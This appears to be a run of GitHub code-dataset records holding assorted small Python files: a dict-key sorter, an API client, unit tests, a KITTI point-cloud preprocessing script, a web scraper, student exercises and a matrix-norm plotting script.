0\nEXIT_CODE_WITH_CHANGES = 1\n\n\nclass Sorting:\n ALPHABETICALY = 'alpha'\n ALL = (ALPHABETICALY,)\n\n\ndef get_formatting(elements: List[cst.CSTNode]):\n return [\n {\n 'comma': element.comma,\n 'whitespace_after_colon': element.whitespace_after_colon,\n 'whitespace_before_colon': element.whitespace_before_colon,\n }\n for element in elements\n ]\n\n\ndef apply_formatting(\n elements: List[cst.CSTNode],\n formatting: List[Dict[str, cst.CSTNode]],\n):\n return [\n element.with_changes(**fmt)\n for fmt, element in zip(formatting, elements)\n ]\n\n\ndef extract_key_value(node: cst.BaseString):\n return re.match(KEY_PATTERN, node.value).groupdict()['key']\n\n\ndef get_sorting_func(sorting_type: str):\n return {\n 'alpha': lambda x: extract_key_value(x.key),\n }[sorting_type]\n\n\ndef sort_by(elements: List[cst.DictElement], key: Callable):\n # special symbols -> cipher -> uppercase -> lowercase\n return tuple(sorted(elements, key=key))\n\n\ndef ensure_keys_sorted(node: cst.Dict, key: Callable):\n return sort_by(node.elements, key) == node.elements\n\n\ndef ensure_key_not_str(element: cst.Element):\n return not isinstance(element.key, cst.BaseString)\n\n\ndef ensure_starred_element(element: cst.Element):\n return isinstance(element, cst.StarredDictElement)\n\n\ndef ensure_key_formatted_string(element: cst.Element):\n return isinstance(element.key, cst.FormattedString)\n\n\ndef should_transform_dict(\n node: cst.Dict,\n funcs: tuple[Callable] = (\n ensure_starred_element,\n ensure_key_formatted_string,\n ensure_key_not_str,\n ),\n) -> bool:\n for element in node.elements:\n for func in funcs:\n if func(element):\n return False\n return True\n\n\nclass DictKeysSorter(cst.CSTTransformer):\n def __init__(self, sorting_type):\n self.transformed = False\n self.sorting_func = get_sorting_func(sorting_type)\n\n def leave_Dict(self, original_node, updated_node):\n if not should_transform_dict(updated_node):\n return updated_node\n\n if ensure_keys_sorted(updated_node, self.sorting_func):\n return updated_node\n\n self.transformed = True\n\n sorted_elements = apply_formatting(\n elements=sort_by(updated_node.elements, key=self.sorting_func),\n formatting=get_formatting(updated_node.elements),\n )\n\n return updated_node.with_changes(elements=tuple(sorted_elements))\n\n\ndef ensure_python_file(file_path: Path):\n return file_path.suffix == '.py'\n\n\ndef fix_file(file_path, sorting: str) -> int:\n is_fixed = False\n\n with file_path.open('r') as file_obj:\n syntax_tree = cst.parse_module(file_obj.read())\n\n sorter = DictKeysSorter(sorting)\n transformed_tree = syntax_tree.visit(sorter)\n\n if sorter.transformed:\n with file_path.open('w') as file_obj:\n file_obj.write(transformed_tree.code)\n is_fixed = True\n\n return is_fixed\n\n\ndef main(argv: Optional[Sequence[str]] = None) -> int:\n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'filenames',\n nargs='*',\n metavar='path',\n type=str,\n help='Filenames to check.',\n )\n parser.add_argument(\n '--sorting',\n type=str,\n choices=[Sorting.ALL],\n default=Sorting.ALPHABETICALY,\n help='Sorting style applied to dictionary keys.',\n action='store',\n )\n args = parser.parse_args(argv)\n\n return_code = EXIT_CODE_NO_CHANGES\n\n if not args.filenames:\n return return_code\n\n for filename in args.filenames:\n file_path = Path(filename)\n if not ensure_python_file(file_path):\n continue\n\n is_fixed = fix_file(file_path, args.sorting)\n if is_fixed:\n print(f'Fixed {filename}')\n return_code = EXIT_CODE_WITH_CHANGES\n\n return return_code\n\n\nif __name__ == '__main__':\n exit(main())\n","repo_name":"dbohomiakov/dict-keys-sorter","sub_path":"dict_keys_sorter.py","file_name":"dict_keys_sorter.py","file_ext":"py","file_size_in_byte":4187,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"35888502484","text":"import time\nfrom typing import Optional, Dict, Any, Callable\nimport requests\n\nfrom cryptocompsdk.config import MAX_LIMIT_PER_API_CALL\nfrom cryptocompsdk.logger import logger\nfrom cryptocompsdk.response import ResponseException, ResponseAPIBase\n\n\nclass Request:\n\n def __init__(self, url: str, payload: Optional[Dict[str, Any]], response: requests.Response):\n self.url = url\n self.payload = payload\n self.response = response\n\n @property\n def json(self) -> dict:\n return self.response.json()\n\n\nclass APIBase:\n _exception_class = ResponseException\n\n def __init__(self, api_key: str, throttle: Optional[float] = None):\n self.api_key = api_key\n self.throttle = throttle\n\n def request(self, url: str, payload: Optional[Dict[str, Any]] = None) -> Request:\n api_key_dict = {'api_key': self.api_key}\n payload = self.filter_payload(payload)\n if payload is not None:\n payload.update(api_key_dict)\n else:\n payload = api_key_dict\n\n result = requests.get(url, params=payload)\n logger.debug(f'Requested {result.request.url}')\n return Request(url, payload, result)\n\n def filter_payload(self, payload: Optional[Dict[str, Any]]):\n if payload is None:\n return payload\n\n # Remove None values as they were just defaults\n without_none = {key: value for key, value in payload.items() if value is not None}\n\n # Convert booleans into boolean strings that API is expecting\n with_str_bools = {key: _bool_to_str_if_bool(value) for key, value in without_none.items()}\n\n return with_str_bools\n\n def _get_one_or_paginated(self, url: str, payload: Optional[Dict[str, Any]] = None,\n max_api_calls: Optional[int] = None,\n limit_in_payload: bool = True, date_name: str = 'toTs'):\n \"\"\"\n This method should be called in the subclass .get method\n\n :param url: url to request\n :param payload: data to send with request\n :param max_api_calls: limit on number of API calls\n :param limit_in_payload: whether to include the limit parameter in request payload\n :param date_name: name of date in payload\n :return:\n \"\"\"\n if payload is not None and payload.get('limit') == 0:\n return self._get_with_pagination(\n url,\n payload=payload,\n max_api_calls=max_api_calls,\n limit_in_payload=limit_in_payload,\n date_name=date_name,\n )\n return self._get(url, payload=payload)\n\n def _get(self, url: str, payload: Optional[Dict[str, Any]] = None):\n if self.throttle is not None:\n time.sleep(self.throttle)\n data = self.request(url, payload)\n obj = self._class_factory(data.json)\n # isinstance dict added for development of api where class has not been set yet\n if isinstance(obj, dict):\n return obj\n if obj.has_error:\n if payload is not None:\n payload_str = f'payload {payload}'\n else:\n payload_str = 'no payload'\n raise self._exception_class(f'Requested {url} with {payload_str}, '\n f'got {data.json} as response')\n obj._request = data\n return obj\n\n def _get_with_pagination(self, url: str, payload: Dict[str, Any],\n max_api_calls: Optional[int] = None,\n limit_in_payload: bool = True, date_name: str = 'toTs'):\n if max_api_calls is None:\n # TODO [#4]: less hackish\n max_api_calls = 10000000\n\n if limit_in_payload:\n payload['limit'] = MAX_LIMIT_PER_API_CALL\n\n end_time = payload[date_name]\n i = -1\n while i + 1 < max_api_calls:\n i += 1\n payload[date_name] = end_time\n try:\n data = self._get(url, payload)\n except self._exception_class as e:\n # In blockchain history API, upon going too far back, it sends this message back\n if 'does not have data available before requested timestamp' in str(e):\n break\n else:\n raise e\n if i == 0:\n all_data = data\n if data.is_empty:\n # In price history API, upon going too far back, it sends 0 for all data\n break\n if i != 0:\n # chop off matching record. The end_time observation will be included in both responses\n data.delete_record_matching_time(end_time)\n all_data = data + all_data\n end_time = data.time_from\n\n all_data.trim_empty_records_at_beginning()\n\n return all_data\n\n def _class_factory(self, data: dict):\n raise NotImplementedError('must implement in subclass')\n\n\ndef _bool_to_str(boolean: bool) -> str:\n if not isinstance(boolean, bool):\n raise ValueError(f'non-boolean {boolean} passed to _bool_to_str')\n\n if boolean:\n return 'true'\n\n return 'false'\n\n\ndef _bool_to_str_if_bool(obj: Any) -> Any:\n if not isinstance(obj, bool):\n return obj\n return _bool_to_str(obj)\n","repo_name":"nickderobertis/cryptocompare-py","sub_path":"cryptocompsdk/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":5325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21817026464","text":"# Test the Astrohaven dome interface using a simulated dome controller.\nfrom contextlib import suppress\n\nimport pytest\nimport serial\n\nfrom panoptes.pocs import hardware\nfrom panoptes.pocs.dome import astrohaven\nfrom panoptes.pocs.dome import create_dome_simulator\n\nfrom panoptes.utils.config.client import set_config\n\n\n@pytest.fixture(scope='function')\ndef dome():\n # Install our test handlers for the duration.\n serial.protocol_handler_packages.append('panoptes.pocs.dome')\n\n # Modify the config so that the dome uses the right controller and port.\n set_config('simulator', hardware.get_all_names(without=['dome']))\n set_config('dome', {\n 'brand': 'Astrohaven',\n 'driver': 'astrohaven',\n 'port': 'loop://',\n })\n the_dome = create_dome_simulator()\n\n yield the_dome\n with suppress(Exception):\n the_dome.disconnect()\n\n # Remove our test handlers.\n serial.protocol_handler_packages.remove('panoptes.pocs.dome')\n\n\ndef test_create(dome):\n assert isinstance(dome, astrohaven.AstrohavenDome)\n assert isinstance(dome, astrohaven.Dome)\n # We use rs232.SerialData, which automatically connects.\n assert dome.is_connected\n\n\ndef test_connect_and_disconnect(dome):\n # We use rs232.SerialData, which automatically connects.\n assert dome.is_connected is True\n dome.disconnect()\n assert dome.is_connected is False\n assert dome.connect() is True\n assert dome.is_connected is True\n dome.disconnect()\n assert dome.is_connected is False\n\n\ndef test_disconnect(dome):\n assert dome.connect() is True\n dome.disconnect()\n assert dome.is_connected is False\n # Can repeat.\n dome.disconnect()\n assert dome.is_connected is False\n\n\n@pytest.mark.skip(reason='No astrohaven_simulator protocol anymore')\ndef test_open_and_close_slit(dome):\n dome.connect()\n\n assert dome.open() is True\n assert dome.status['open'] == 'open_both'\n assert dome.is_open is True\n\n # Try to open shutter\n assert dome.open() is True\n\n assert dome.close() is True\n assert dome.status['open'] == 'closed_both'\n assert dome.is_closed is True\n\n # Try to close again\n assert dome.close() is True\n\n dome.disconnect()\n","repo_name":"panoptes/POCS","sub_path":"tests/test_dome_astrohaven.py","file_name":"test_dome_astrohaven.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"78"} +{"seq_id":"718858881","text":"import pandas as pd\nfrom xml.dom import minidom\nfrom tkinter.filedialog import askopenfilenames\nfrom datetime import datetime\n\nEmD = []\nNumNF = []\nNumCTE = []\nClientName = []\nDeliveryCity = []\nCteValue = []\n\ncte_path = askopenfilenames(filetypes=[(\"Text files\", \".xml\")])\n\nfor actual_xml in cte_path:\n tree = minidom.parse(actual_xml)\n\n emission_date = tree.getElementsByTagName('dhEmi')\n num_nf = tree.getElementsByTagName('chave')\n num_cte = tree.getElementsByTagName('nCT')\n client_name = tree.getElementsByTagName('xNome')\n delivery_city = tree.getElementsByTagName('xMun')\n cte_value = tree.getElementsByTagName('vRec')\n\n EmD.append(emission_date[0].firstChild.data)\n NumNF.append(num_nf[0].firstChild.data)\n NumCTE.append(num_cte[0].firstChild.data)\n ClientName.append(client_name[2].firstChild.data)\n DeliveryCity.append(delivery_city[2].firstChild.data)\n CteValue.append(cte_value[0].firstChild.data)\n\nfor pos, each_date in enumerate(EmD):\n emission_date = datetime.fromisoformat(each_date)\n formatted_emission_date = f'{emission_date.day}/{emission_date.month:02d}/{emission_date.year}'\n EmD[pos] = formatted_emission_date\n\nfor pos, each_numNf in enumerate(NumNF):\n each_numNf = each_numNf[28:34]\n NumNF[pos] = each_numNf\n\ncte_df = pd.DataFrame(list(zip(EmD, NumNF, NumCTE, ClientName, DeliveryCity, CteValue)), columns=['Data Emissao', 'Numero NF', 'Numero CTE', 'Nome Cliente', 'Cidade Entrega', 'Valor CTE'])\n\nCteValueSum = list(map(float, CteValue))\ntotal_cte = sum(CteValueSum)\ntotal_cte = str(total_cte)\ncte_df.loc[len(cte_df.index)] = ['-', '-', '-', '-', '-', total_cte + '0']\ncte_df.index += 1\n\ncte_df = cte_df.rename(index={len(cte_df.index):'TOTAL'})\n\ncte_df.to_excel(\"controle_cte.xlsx\")","repo_name":"DavidSBarbosa/controle_cte","sub_path":"controle_cte.py","file_name":"controle_cte.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"23293898337","text":"from twisted.internet.defer import inlineCallbacks, returnValue\nfrom twisted.trial.unittest import TestCase\nfrom twisted.internet.defer import setDebugging\nfrom twisted.internet import reactor\nfrom twisted.internet.task import Clock\n\nfrom vumi.transports import Transport\nfrom vumi.transports.tests.helpers import TransportHelper\nfrom vumi.tests.helpers import PersistenceHelper, VumiTestCase\n\nfrom middlewares.custom_middleware_stack import (\n CustomMiddlewareStack, StopPropagation, useCustomMiddleware)\nfrom middlewares.window_manager_middleware import WindowManagerMiddleware\nfrom components.window_manager import VusionWindowManager\n\n\n@useCustomMiddleware\nclass DummyTransport(Transport):\n \n outbound_msgs = []\n \n def handle_outbound_message(self, message):\n self.outbound_msgs.append(message)\n\n\nclass WindowManagerTestCase(VumiTestCase):\n\n @inlineCallbacks\n def setUp(self):\n self.tx_helper = self.add_helper(TransportHelper(DummyTransport))\n self.transport = yield self.tx_helper.get_transport({})\n \n self.persistence_helper = self.add_helper(PersistenceHelper())\n redis = yield self.persistence_helper.get_redis_manager()\n \n self.transport_name = self.transport.transport_name\n config = {'window_size': 2,\n 'flight_lifetime': 1,\n 'monitor_loop': 0.5}\n self.mw = WindowManagerMiddleware('mw1', config, self.transport)\n\n yield self.mw.setup_middleware(redis)\n \n self.clock = Clock()\n self.patch(VusionWindowManager, 'get_clock', lambda _: self.clock)\n def mock_clock_time(self):\n return self._clocktime\n self.patch(VusionWindowManager, 'get_clocktime', mock_clock_time)\n self.mw.wm._clocktime = 0\n\n @inlineCallbacks\n def tearDown(self):\n yield self.mw.teardown_middleware()\n yield super(WindowManagerTestCase, self).tearDown()\n\n @inlineCallbacks\n def test_handle_outbound(self):\n msg_1 = self.tx_helper.make_outbound('hello world 1', message_id='1')\n yield self.assertFailure(\n self.mw.handle_outbound(msg_1, self.mw.queue_name),\n StopPropagation)\n stored_msg_1 = yield self.mw.wm.get_data(self.mw.queue_name, '1')\n self.assertEqual(msg_1.to_json(), stored_msg_1)\n\n msg_2 = self.tx_helper.make_outbound('hello world 2', message_id='2')\n yield self.assertFailure(\n self.mw.handle_outbound(msg_2, self.mw.queue_name),\n StopPropagation)\n\n msg_3 = self.tx_helper.make_outbound('hello world 3', message_id='3')\n yield self.assertFailure(\n self.mw.handle_outbound(msg_3, self.mw.queue_name),\n StopPropagation)\n\n count_waiting = yield self.mw.wm.count_waiting(self.mw.queue_name)\n self.assertEqual(3, count_waiting) \n\n yield self.mw.wm._monitor_windows(self.mw.send_outbound)\n count_waiting = yield self.mw.wm.count_waiting(self.mw.queue_name)\n self.assertEqual(1, count_waiting)\n count_in_flight = yield self.mw.wm.count_in_flight(self.mw.queue_name)\n self.assertEqual(2, count_in_flight)\n self.assertEqual(2, len(self.mw.worker.outbound_msgs))\n\n #acknoledge one\n ack = self.tx_helper.make_ack(sent_message_id='1')\n yield self.mw.handle_event(ack, self.mw.queue_name)\n count_in_flight = yield self.mw.wm.count_in_flight(self.mw.queue_name)\n self.assertEqual(1, count_in_flight)\n #make sure it has been deleted\n stored_msg_1 = yield self.mw.wm.get_data(self.mw.queue_name, '1')\n self.assertTrue(stored_msg_1 is None)\n\n yield self.mw.wm._monitor_windows(self.mw.send_outbound)\n count_in_flight = yield self.mw.wm.count_in_flight(self.mw.queue_name)\n self.assertEqual(2, count_in_flight)\n\n #now they expire\n self.mw.wm._clocktime = 20\n yield self.mw.wm.clear_expired_flight_keys()\n #make sure it has been deleted\n stored_msg_2 = yield self.mw.wm.get_data(self.mw.queue_name, '2') \n # the expired message should be deleted\n self.assertTrue(stored_msg_2 is None)\n \n #the expired flight keys should be cleanedup\n expired_flight_keys = yield self.mw.wm.get_expired_flight_keys(self.mw.queue_name)\n self.assertEqual([], expired_flight_keys)\n \n count_in_flight = yield self.mw.wm.count_in_flight(self.mw.queue_name)\n self.assertEqual(0, count_in_flight) \n \n","repo_name":"texttochange/vusion-backend","sub_path":"middlewares/tests/test_window_manager_middleware.py","file_name":"test_window_manager_middleware.py","file_ext":"py","file_size_in_byte":4541,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"36033340280","text":"import argparse\nimport io\nimport os\nimport shutil\nfrom zipfile import ZipFile\n\nos.environ[\"OMP_NUM_THREADS\"] = \"4\"\nos.environ[\"OPENBLAS_NUM_THREADS\"] = \"4\"\nos.environ[\"MKL_NUM_THREADS\"] = \"6\"\nos.environ[\"VECLIB_MAXIMUM_THREADS\"] = \"4\"\nos.environ[\"NUMEXPR_NUM_THREADS\"] = \"6\"\n\nimport numpy as np\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--data_root\", type=str, default=\"./data/kitti/raw/\")\nparser.add_argument(\"--output_root\", type=str, default=\"./data/kitti/processed/\")\nparser.add_argument(\"--make_tar\", action=\"store_true\")\nargs = parser.parse_args()\n\nos.makedirs(args.output_root, exist_ok=True)\n\n\ndef extract_init_seed(pts_sort, n_lpr, th_seed):\n lpr = np.mean(pts_sort[:n_lpr, 2])\n seed = pts_sort[pts_sort[:, 2] < lpr + th_seed, :]\n return seed\n\n\ndef extract_ground(pts):\n th_seeds_ = 1.2\n num_lpr_ = 20\n n_iter = 10\n th_dist_ = 0.3\n pts_sort = pts[pts[:, 2].argsort(), :]\n pts_g = extract_init_seed(pts_sort, num_lpr_, th_seeds_)\n normal_ = np.zeros(3)\n for i in range(n_iter):\n mean = np.mean(pts_g, axis=0)[:3]\n xx = np.mean((pts_g[:, 0] - mean[0]) * (pts_g[:, 0] - mean[0]))\n xy = np.mean((pts_g[:, 0] - mean[0]) * (pts_g[:, 1] - mean[1]))\n xz = np.mean((pts_g[:, 0] - mean[0]) * (pts_g[:, 2] - mean[2]))\n yy = np.mean((pts_g[:, 1] - mean[1]) * (pts_g[:, 1] - mean[1]))\n yz = np.mean((pts_g[:, 1] - mean[1]) * (pts_g[:, 2] - mean[2]))\n zz = np.mean((pts_g[:, 2] - mean[2]) * (pts_g[:, 2] - mean[2]))\n cov = np.array([[xx, xy, xz], [xy, yy, yz], [xz, yz, zz]])\n U, S, V = np.linalg.svd(cov)\n normal_ = U[:, 2]\n d_ = -normal_.dot(mean)\n th_dist_d_ = th_dist_ - d_\n result = pts[:, :3].dot(normal_)\n pts_n_g = pts[result > th_dist_d_]\n pts_g = pts[result < th_dist_d_]\n return pts_g, pts_n_g\n\n\ndef process_scene(split=\"training\", scene_id=\"0019\"):\n velodyne_path = os.path.join(args.data_root, \"data_tracking_velodyne.zip\")\n label_path = os.path.join(args.data_root, \"data_tracking_label_2.zip\")\n calib_path = os.path.join(args.data_root, \"data_tracking_calib.zip\")\n detection_path = os.path.join(args.data_root, \"data_tracking_detection.zip\")\n assert os.path.exists(velodyne_path), \"Please download the KITTI dataset first\"\n assert os.path.exists(label_path), \"Please download the KITTI dataset first\"\n assert os.path.exists(calib_path), \"Please download the KITTI dataset first\"\n assert os.path.exists(detection_path), \"Please download the KITTI dataset first\"\n\n clean_pcs_dir = os.path.join(args.output_root, split, \"clean_pcs\", scene_id)\n os.makedirs(clean_pcs_dir, exist_ok=True)\n\n with ZipFile(velodyne_path) as velodyne_zf:\n scene_files = [\n file for file in velodyne_zf.namelist() if f\"{split}/velodyne/{scene_id}\" in file and file.endswith(\".bin\")\n ]\n scene_files = sorted(scene_files)\n\n for frame_idx, frame_file in enumerate(scene_files):\n assert frame_file == f\"{split}/velodyne/{scene_id}/{frame_idx:06d}.bin\"\n with io.BufferedReader(velodyne_zf.open(frame_file, mode=\"r\")) as f:\n pc = np.frombuffer(f.read(), dtype=np.float32).reshape(-1, 4)\n ground_pc, clean_pc = extract_ground(pc[:, :3])\n np.save(os.path.join(clean_pcs_dir, \"{}.npy\".format(frame_idx)), clean_pc)\n\n with ZipFile(detection_path) as detection_zf:\n scene_files = [\n file\n for file in detection_zf.namelist()\n if f\"{split}/detection/{scene_id}\" in file and file.endswith(\".pkl\")\n ]\n scene_files = sorted(scene_files)\n\n for frame_idx, frame_file in enumerate(scene_files):\n assert frame_file == f\"{split}/detection/{scene_id}/{frame_idx:06d}.pkl\"\n detection_zf.extract(frame_file, path=args.output_root)\n\n with ZipFile(label_path) as label_zf:\n scene_file = f\"{split}/label_02/{scene_id}.txt\"\n label_zf.extract(scene_file, path=args.output_root)\n\n with ZipFile(calib_path) as calib_zf:\n scene_file = f\"{split}/calib/{scene_id}.txt\"\n calib_zf.extract(scene_file, path=args.output_root)\n\n\nif __name__ == \"__main__\":\n process_scene(\"training\", \"0019\")\n process_scene(\"training\", \"0020\")\n if args.make_tar:\n shutil.make_archive(\n args.output_root,\n \"tar\",\n os.path.join(args.output_root, \"..\"),\n os.path.split(os.path.normpath(args.output_root))[-1],\n )\n","repo_name":"jianglongye/implicit-tracking","sub_path":"tools/prepare_kitti.py","file_name":"prepare_kitti.py","file_ext":"py","file_size_in_byte":4519,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"78"} +{"seq_id":"23052723696","text":"def binary_search(array, element, left, right):\r\n if left > right: # если левая граница превысила правую,\r\n return False # значит элемент отсутствует\r\n\r\n middle = (right + left) // 2 # находим середину последовательности\r\n if array[middle-1] < element <= array[middle]: # если элемент в середине,\r\n return middle-1 # возвращаем этот индекс\r\n elif element < array[middle]: # если элемент меньше элемента в середине\r\n # рекурсивно ищем в левой половине\r\n return binary_search(array, element, left, middle - 1)\r\n else: # иначе в правой\r\n return binary_search(array, element, middle + 1, right)\r\n\r\narray = list(map(int,input(\"Введите несколько целых чисел через пробел \").split()))\r\n\r\n\r\n\r\nelement = int(input(\"Введите любое случайное число в диапазоне чисел введенных ранее \"))\r\n\r\narray = sorted(array)\r\nleft = int(array[0])\r\nright = int(array[-1])\r\n\r\nif element < left or element > right:\r\n print('Числа нет в диапазоне')\r\nelse:\r\n print('индекс числа последовательности, которое меньше введенного =', binary_search(array, element, 0, len(array) - 1))\r\n print('отсортированная введенная последовательность', array)","repo_name":"igorQA123/task22.9.1","sub_path":"22.py","file_name":"22.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4504022446","text":"from bs4 import BeautifulSoup as BS\r\nimport requests\r\n\r\n# Base URL of content pages\r\nbase_url = \"http://highscalability.com/blog/?currentPage={:d}\"\r\n\r\n# A variable for collecting links to individual articles\r\nlinks = []\r\n\r\n# Loop through the first 10 content pages\r\nfor i in range(1, 11):\r\n\r\n # Generate the actual URL to the content page\r\n url = base_url.format(i)\r\n print(url)\r\n\r\n # Send HTTP request\r\n res = requests.get(url, timeout=5)\r\n if res.status_code == 200:\r\n\r\n # Parse the page using BeautifulSoup\r\n soup = BS(res.text, 'lxml')\r\n\r\n # Extract links of individual articles\r\n anchors = soup.select(\"h2 a\")\r\n for a in anchors:\r\n links.append(a[\"href\"])\r\n","repo_name":"albertauyeung/iems5703","sub_path":"lectures/files/scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7590415466","text":"import pytest\n\nfrom core.lexer import ListLexer\nfrom .parser import Parser, SpeculationException\n\n\nclass TestListParser:\n @staticmethod\n def _parse_success_test_cases() -> list[str]:\n return [\n '[]',\n '[a]',\n '[a, b, c]',\n '[a, b, c=d]',\n '[a, [b, c, d=e], [f=g]]',\n '[a, [], []]',\n '[a, b]=[c, d]',\n '[a, b]=[[c], [de=f]]',\n ]\n\n @staticmethod\n def _parse_fail_test_cases() -> list[str]:\n return [\n '[',\n ']',\n '[a, b, c,]',\n '[a, [, c]',\n '[a, b, c][',\n '[a, b=, c]',\n '[a, b]=[c, d',\n '[a, b]=[[c], de=f]]',\n ]\n\n @pytest.mark.parametrize('input_text', _parse_success_test_cases())\n def test_parse_success(self, input_text):\n lexer = ListLexer(input_text)\n parser = Parser(lexer)\n parser.parse()\n\n @pytest.mark.parametrize('input_text', _parse_fail_test_cases())\n def test_parse_fail(self, input_text):\n lexer = ListLexer(input_text)\n parser = Parser(lexer)\n with pytest.raises(SpeculationException):\n parser.parse()\n","repo_name":"fidemin/language-implementation-practice","sub_path":"enhanced_parser/test_parser.py","file_name":"test_parser.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15421957660","text":"'''\n구현, 수학 문제\n\nwhile 문으로 반복되는 값이 나오기 전까지 반복하고, 나올때 break를 건다.\n그 후에 해당 res를 반복되기 전의 값들로 다시 초기화 한 후,\nres의 길이를 출력하면 된다.\n\ndeque를 안써도 충분히 풀 수도 있는데, 이것 저것 사용해 보고 싶은 마음에 사용했다.\n'''\n\nfrom collections import deque\n\na, p = map(int, input().split())\n\n# 테스트\n# a, p = 57, 2\n\nq = deque([a])\nres = [a]\n\nwhile 1:\n x = str(q.popleft())\n temp = 0\n\n for i in x:\n temp += int(i) ** p\n \n if temp in res:\n res = res[:res.index(temp)]\n break\n\n res.append(temp)\n q.append(temp)\n\nprint(len(res))\n","repo_name":"rkdalsdn94/algoalgo","sub_path":"solved_ac/Silver_4/반복수열_2331.py","file_name":"반복수열_2331.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20940516864","text":"# Hacer una función que reciba un entero positivo de exactamente 3 dígitos\r\n# y suma el valor de los digitos\r\n# Entradas: numero\r\n# Salida: suma\r\n# Restricciones: numero >= 0, numero tiene al menos tres digitos\r\ndef suma(numero):\r\n if ((numero >= 100) and (numero <= 999)):\r\n unidad = numero %10\r\n diez = (numero // 10) %10\r\n cien = numero // 100\r\n return cien + diez + unidad\r\n else:\r\n return \"Error\"\r\n","repo_name":"MrWrynn/TutorialPython","sub_path":"FuncionSuma.py","file_name":"FuncionSuma.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31681563130","text":"import matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\n# from fancyimpute import NuclearNormMinimization\nfrom matplotlib import cm\n\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\ndef coherent_matrix():\n u1 = (np.array([1, 0]) + np.array([0, 1]))/ np.sqrt(2)\n u2 = (np.array([1, 0]) - np.array([0, 1]))/ np.sqrt(2)\n A = np.outer(u1, u2)\n return A\n\ndef matrix_scalar(A: np.ndarray, B: np.ndarray) -> float:\n return np.trace(np.outer(A,B))\n\ndef coherence(U: np.ndarray):\n return 2 * (np.linalg.norm((U @ np.array([1, 0])) * U))**2\n\n\ndef get_dual(base):\n alpha = -1 * base[0][0,1]/ base[1][0,1]\n return alpha\n\nM = np.ones((2, 2), dtype=float)\nM[1,0] = 2\nM[0,0] = 2\n\nprint(f\"Matrix rank: {np.linalg.matrix_rank(M)}\")\nU, s, VT = np.linalg.svd(M, full_matrices=True, compute_uv=True)\n\nprint(f\"U:\\n{U}\")\nprint(f\"VT:\\n{VT}\")\nprint(f\"Singular values {s}\")\n\ndef get_coefficients(A: np.ndarray, orthonormal_base: list) -> tuple:\n l1 = U[:,0]@A@VT[0,:]\n l2 = U[:,1]@A@VT[1,:]\n return l1,l2\n\nM_norm = s.sum()\nprint(f\"M norm {M_norm}\")\nbase = [np.outer(U[:,0], VT[:,0]), np.outer(U[:,1], VT[:,1])]\nprint(f\"Basis vector u1v1^T:\\n{base[0]};\\n Basis vector u2v2^T:\\n{base[1]}\")\nget_coefficients(M, base)\n\nx = np.arange(-5, 5, 0.1)\ny = np.arange(-5, 5, 0.1)\nX, Y = np.meshgrid(x, y)\nZ = np.abs(X) + np.abs(Y)\nfig, ax = plt.subplots(figsize=(6, 6))\nax.contour(X, Y, Z, levels=[M_norm])\nplt.scatter(*s, c='r')\nplt.text(*(1.01*s), \"M\", fontsize=12)\nfor i in np.arange(-10, 10, 0.5):\n A = M.copy()\n A[0, 1] = i\n coeffs = get_coefficients(A, base)\n if i == -10:\n plt.text(*(np.array(coeffs) * 1.01), \"feasible set\", fontsize=12)\n plt.scatter(*get_coefficients(A, base), c='b', s=1.5)\n\nplt.scatter(1, get_dual(base), c='b')\nplt.text((1 + 0.01), get_dual(base) * (1.01), \"Y\", fontsize=12)\nprint(f\"Dual Y:\\n {base[0]+get_dual(base)*base[1]}\")\nplt.xlabel(r'$u_1v_1^T$')\nplt.ylabel(r'$u_2v_2^T$')\nplt.show()\n\n\nz = get_coefficients(M, base)\n\nX = np.arange(-5, 5, 0.25)\nY = np.arange(-5, 5, 0.25)\nX, Y = np.meshgrid(X, Y)\nZ = np.abs(X) + np.abs(Y)\n\nfig = plt.figure()\nax = Axes3D(fig, auto_add_to_figure=False)\nfig.add_axes(ax)\nax.plot_surface(X, Y, Z, rstride=1, cstride=1, alpha=.6, cmap=cm.Oranges)\nax.contour(X, Y, Z, 20, lw=1, linestyles=\"solid\")\nsubgradient = base[0]+get_dual(base)*base[1]\nX = np.arange(s[0]-4, s[0]+4, 0.25)\nY = np.arange(s[1]-2, s[1]+2, 0.25)\nX, Y = np.meshgrid(X, Y)\nZ = M_norm + (X-s[0])+ get_dual(base)*(Y-s[1])\nax.plot_surface(X, Y, Z, rstride=1, cstride=1, lw=0.5,cmap=cm.Blues, alpha=.4, antialiased=False)\n#ax.plot_wireframe(X, Y, Z, rstride=5, cstride=5)\n\nM3d = s[0], s[1], np.abs(s[0]) + np.abs(s[1])\nax.scatter(*M3d, c='r')\nax.scatter(*s, 0, c='black')\n\nfor i in np.arange(-5, 5, 0.01):\n A = M.copy()\n A[0, 1] = i\n x, y = get_coefficients(A, base)\n cords = x, y, np.abs(x) + np.abs(y)\n ax.scatter(*cords, c='b')\n # ax.scatter(x, y, 0, c='b', s=1.5)\n\n# 